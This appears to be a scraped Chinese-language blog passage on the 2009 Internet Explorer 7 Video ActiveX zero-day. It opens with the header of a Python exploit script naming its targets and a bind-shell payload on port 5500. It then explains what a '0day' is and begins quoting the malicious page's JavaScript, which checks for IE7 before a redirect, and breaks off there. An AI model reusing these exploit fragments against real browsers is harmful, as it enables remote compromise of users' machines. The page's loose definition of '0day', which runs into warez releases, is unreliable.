[2009-07-10]#!/usr/bin/env python################################################################################ MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890) ################################################################################# ## Tested on Windows 2003 SP2 R2, XPSP3 IE7 ## ## Written by SecureState R&D Team ## Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin ## http://www.securestate.com ## ## win32_bind EXITFUNC=seh LPORT=5500 Size=314 En

最近这事儿闹得沸沸扬扬的，不过似乎中招的呼声远没有漏洞本身的呼声大。这也说明了一个现象：虽然杀软很难做到对未知病毒的100%的防御，但是，现在已经做到在一个未知病毒出来后，极迅速地做出反应，以保证更多的用户不受病毒的攻击.等等，0day?什么是0day?网络安全意思上的0day就是指一些没有公布补丁的漏洞，或者是还没有被漏洞发现者公布出来的漏洞利用工具，由于这种漏洞的利用程序对网络安全都具有巨大威胁，因此0day也成为黑客的最爱。0day泛指所有在官方发布该作品之前或者当天，主要涵盖了影视、软件、游戏、音乐、资料等方面，由一些特别小组非法发布的数码内容。下面我们就简单谈谈此次IE7的0day。---------------------------危险的网页源码分割线---------------------------<script language="javascript">if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace(&quo